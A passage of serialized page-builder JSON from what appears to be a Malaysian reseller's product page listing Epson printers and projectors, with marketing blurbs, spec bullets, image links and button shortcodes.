A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Speed: Up to 30ppm<\\/li>\\n \\t<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li>\\n \\t<li>Quality prints with new Epson Technologies<\\/li>\\n \\t<li>New print job management features<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2426 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><br>\\n\\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 35ppm<\\/li>\\n \\t<li>Auto-Duplex<\\/li>\\n \\t<li>Ethernet &amp; Epson iPrint<\\/li>\\n \\t<li>2 optional paper cassette tray<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2427 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><br><br>\\n\\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 40 ppm<\\/li>\\n \\t<li>Epson iPrint<\\/li>\\n \\t<li>Ethernet<\\/li>\\n \\t<li>4 optional cassette trays<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"75\",\"right\":\"75\",\"bottom\":\"75\",\"left\":\"75\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":\"-2\",\"bottom\":\"-2\",\"left\":\"-2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4ede29a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/h4><p><br \\/><img class=\\\"wp-image-2431 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"175\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"7bcc969\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"561cb4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":22},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L850 Printer\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2432 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L805 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/h4><p><br \\/>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"11bfc36\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"12\",\"right\":\"12\",\"bottom\":\"12\",\"left\":\"12\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4af8eba\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2055<\\/strong><\\/h4><p><img class=\\\"wp-image-2434 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"646b12f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"12\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"19\",\"bottom\":\"19\",\"left\":\"19\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2142W<\\/strong><\\/h4><br>\\n<img class=\\\"wp-image-2435 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/>\\n\\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\\n<ul>\\n \\t<li>White and Colour Brightness at 4,200lm<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>12000 hours lamp life in eco-mode<\\/li>\\n \\t<li>MHL-enabled<\\/li>\\n \\t<li>Multi-PC Projection<\\/li>\\n \\t<li>Horizontal Keystone Slider<\\/li>\\n \\t<li>Miracast<sup>\\u00ae<\\/sup><\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-L500W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><br>\\n\\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\\n<ul>\\n \\t<li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li>\\n \\t<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li>\\n \\t<li>Laser light source of up to 20,000 hours<\\/li>\\n \\t<li>Virtually maintenance-free for optical engine life<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"16f2278\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson LightScene EV-105<\\/strong><br \\/><br \\/><\\/h4><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"3a36c38\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7dad77c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b7207fe\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"466ac31\",\"elType\":\"widget\",\"settings\":{\"title\":\"ULTRA PORTABLE\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-1785W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2438 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"238\\\" height=\\\"177\\\" \\/>\\n\\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\\n<ul>\\n \\t<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>Real-Time Auto Keystone Correction<\\/li>\\n \\t<li>Split Screen Projection<\\/li>\\n \\t<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4f4cdf2\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2439 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1dcee02\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-5\",\"right\":\"-5\",\"bottom\":\"-5\",\"left\":\"-5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/h4>\\nWith the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.\\n<ul>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>White and Colour Brightness at 3,300lm<\\/li>\\n \\t<li>Multi-PC projection<\\/li>\\n \\t<li>HDMI Connectivity x2<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6efc9f3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/h4><br>\\n<img class=\\\"wp-image-2441 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><br>\\n\\nThe Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.\\n<ul>\\n \\t<li>White and Colour Brightness at 8,000lm<\\/li>\\n \\t<li>WUXGA (1920 x 1200)<\\/li>\\n \\t<li>Edge-blending to create large panoramic images<\\/li>\\n \\t<li>Curve and corner wall projection<\\/li>\\n \\t<li>HDBaseT<\\/li>\\n<\\/ul>\\n<div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/h4><br>\\n<img class=\\\"wp-image-2442 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><br>\\n\\nEpson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.\\n\\n<em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em>\\n<ul>\\n \\t<li>High Brightness<\\/li>\\n \\t<li>Beyond Full HD Resolution<\\/li>\\n \\t<li>Powered Lens<\\/li>\\n \\t<li>Portrait Projection<\\/li>\\n \\t<li>Flexible Installation<\\/li>\\n \\t<li>Edge Blending<\\/li>\\n \\t<li>Point Correction<\\/li>\\n<\\/ul>\\n<div>[maxbutton id=\\\"12\\\" 